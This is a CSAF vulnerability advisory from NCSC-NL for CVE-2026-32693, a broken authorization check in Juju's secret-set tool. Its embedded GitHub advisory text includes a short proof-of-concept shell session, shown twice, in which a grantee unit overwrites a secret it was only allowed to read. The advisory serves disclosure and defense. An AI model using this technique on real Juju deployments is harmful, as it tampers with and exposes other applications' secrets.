{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-32693", "tracking": { "current_release_date": "2026-03-25T18:16:50.317106Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-32693", "initial_release_date": "2026-03-18T13:26:09.359822Z", "revision_history": [ { "date": "2026-03-18T13:26:09.359822Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-18T13:26:12.766698Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-18T13:39:05.728430Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1).| Unknown change." }, { "date": "2026-03-18T13:39:08.867307Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-20T03:41:10.259509Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-20T03:41:13.147765Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:29:45.975241Z", "number": "7", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T18:16:27.031038Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-20T18:16:30.470914Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:16.575151Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-25T18:13:17.898026Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:30.257515Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:semver/3.0.0|<3.6.19", "product": { "name": "vers:semver/3.0.0|<3.6.19", "product_id": "CSAFPID-5843880" } }, { "category": "product_version_range", "name": "vers:unknown/>=3.0.0|<3.6.19", "product": { "name": "vers:unknown/>=3.0.0|<3.6.19", "product_id": "CSAFPID-5866182", "product_identification_helper": { "cpe": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Juju" } ], "category": "vendor", "name": "Canonical" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0.0.0-20221021155847-35c560704ee2|<0.0.0-20260319091847-d06919eb03ec", "product": { "name": "vers:unknown/>=0.0.0-20221021155847-35c560704ee2|<0.0.0-20260319091847-d06919eb03ec", "product_id": "CSAFPID-5907232" } } ], "category": "product_name", "name": "juju" } ], "category": "vendor", "name": "juju" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-32693", "cwe": { "id": "CWE-778", "name": "Insufficient Logging" }, "notes": [ { "category": "description", "text": "In Juju from version 3.0.0 through 3.6.18, the authorization of the \"secret-set\" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the \"secret-set\" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-32693" }, { "category": "description", "text": "In Juju from version 3.0.0 through 3.6.18, the authorization of the \"secret-set\" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the \"secret-set\" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-32693" }, { "category": "description", "text": "In Juju from version 3.0.0 through 3.6.18, the authorization of the \"secret-set\" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the \"secret-set\" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32693" }, { "category": "description", "text": "### Summary\n\nGrantee is able to update secret content using the `secret-set` tool due to broad Kubernetes access policy.\nImplications are that it is possible, knowing a Kubernetes secret identifier (e.g. name), to patch without affecting the secret, revealing the value, or, patching while affecting the secrets value.\n\n### Details\n\nWhen a Juju secret is \"granted\" to an app, that app should be able to read the secret content but not modify it, and should be able to only read secrets that have been granted to it.\n\nAuthorization of the `secret-set` hook tool / controller request is not performed correctly, which allows the grantee to update the secret content and to read or affect other secrets.\n\n### PoC\n\nTested:\n- two applications in the same controller, same model: one owns the secret, another get a grant\n- relation between them\n- secret grant\n- Linux AMD64, Canonical K8s, Juju 3.6.8 controller, Juju 3.6.9 CLI\n\nNot tested:\n- admin (user) secrets\n- cross-model relations\n- cross-controller relations\n\n```command\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-add nice=little-value\"\nsecret://9cf1319c-4f4b-44f8-891b-9d1c7d8d3b52/d350nbnmp25c76301ht0\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju show-unit ingress2/0\ningress2/0:\n workload-version: 24.2.0\n opened-ports: []\n charm: ch:amd64/nginx-ingress-integrator-203\n leader: true\n life: alive\n relation-info:\n - relation-id: 11\n endpoint: ingress\n related-endpoint: ingress\n application-data: {}\n related-units:\n evilator/0:\n in-scope: true\n data:\n egress-subnets: 10.152.183.39/32\n ingress-address: 10.152.183.39\n private-address: 10.152.183.39\n - relation-id: 10\n endpoint: nginx-peers\n related-endpoint: nginx-peers\n application-data: {}\n local-unit:\n in-scope: true\n data:\n egress-subnets: 10.152.183.135/32\n ingress-address: 10.152.183.135\n private-address: 10.152.183.135\n provider-id: ingress2-0\n address: 10.1.0.100\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-grant d350nbnmp25c76301ht0 --relation 11\" \n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit evilator/0 \"secret-set d350nbnmp25c76301ht0 nice=who-is-nice-now\" \nupdating secrets: permission denied\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-get d350nbnmp25c76301ht0\" \nnice: who-is-nice-now\n```\n\nWhen the grantee attempts to update the the granted secret:\n\n- `secret-set` command logs an error, though returns OK return status\n- the secret value is updated\n- new secret revision is not created\n- new value is visible to both owner and grantee\n\n### Impact\n\n- the application that owns the secret\n- a third application, if a secret is granted to multiple parties\n- any other application that has secrets in the same Kubernetes secret backend", "title": "github - https://api.github.com/advisories/GHSA-439w-v2p7-pggc" }, { "category": "description", "text": "### Summary\n\nGrantee is able to update secret content using the `secret-set` tool due to broad Kubernetes access policy.\nImplications are that it is possible, knowing a Kubernetes secret identifier (e.g. name), to patch without affecting the secret, revealing the value, or, patching while affecting the secrets value.\n\n### Details\n\nWhen a Juju secret is \"granted\" to an app, that app should be able to read the secret content but not modify it, and should be able to only read secrets that have been granted to it.\n\nAuthorization of the `secret-set` hook tool / controller request is not performed correctly, which allows the grantee to update the secret content and to read or affect other secrets.\n\n### PoC\n\nTested:\n- two applications in the same controller, same model: one owns the secret, another get a grant\n- relation between them\n- secret grant\n- Linux AMD64, Canonical K8s, Juju 3.6.8 controller, Juju 3.6.9 CLI\n\nNot tested:\n- admin (user) secrets\n- cross-model relations\n- cross-controller relations\n\n```command\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-add nice=little-value\"\nsecret://9cf1319c-4f4b-44f8-891b-9d1c7d8d3b52/d350nbnmp25c76301ht0\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju show-unit ingress2/0\ningress2/0:\n workload-version: 24.2.0\n opened-ports: []\n charm: ch:amd64/nginx-ingress-integrator-203\n leader: true\n life: alive\n relation-info:\n - relation-id: 11\n endpoint: ingress\n related-endpoint: ingress\n application-data: {}\n related-units:\n evilator/0:\n in-scope: true\n data:\n egress-subnets: 10.152.183.39/32\n ingress-address: 10.152.183.39\n private-address: 10.152.183.39\n - relation-id: 10\n endpoint: nginx-peers\n related-endpoint: nginx-peers\n application-data: {}\n local-unit:\n in-scope: true\n data:\n egress-subnets: 10.152.183.135/32\n ingress-address: 10.152.183.135\n private-address: 10.152.183.135\n provider-id: ingress2-0\n address: 10.1.0.100\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-grant d350nbnmp25c76301ht0 --relation 11\" \n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit evilator/0 \"secret-set d350nbnmp25c76301ht0 nice=who-is-nice-now\" \nupdating secrets: permission denied\n⋊> dima@bb ⋊> /c/hexanator on main ◦ juju exec --unit ingress2/0 \"secret-get d350nbnmp25c76301ht0\" \nnice: who-is-nice-now\n```\n\nWhen the grantee attempts to update the the granted secret:\n\n- `secret-set` command logs an error, though returns OK return status\n- the secret value is updated\n- new secret revision is not created\n- new value is visible to both owner and grantee\n\n### Impact\n\n- the application that owns the secret\n- a third application, if a secret is granted to multiple parties\n- any other application that has secrets in the same Kubernetes secret backend", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-439w-v2p7-pggc.json?alt=media" }, { "category": "description", "text": "Juju has unauthorized access to out-of-scope Kubernetes secrets in github.com/juju/juju", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4777.json?alt=media" }, { "category": "other", "text": "0.00051", "title": "EPSS" }, { "category": "other", "text": "4.5", "title": "NCSC Score" }, { "category": "other", "text": "Is related to a product by vendor Canonical", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, Exploit code publicly available, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5843880", "CSAFPID-5866182", "CSAFPID-5907232" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32693" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32693" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-32693" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32693.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32693" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-439w-v2p7-pggc" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-439w-v2p7-pggc.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4777.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/juju/juju/security/advisories/GHSA-439w-v2p7-pggc" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32693" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/juju/juju/commit/d06919eb03ec68156818bcc304b5fe1c39a8f9e9" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-439w-v2p7-pggc" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5843880", "CSAFPID-5866182", "CSAFPID-5907232" ] } ], "title": "CVE-2026-32693" } ] }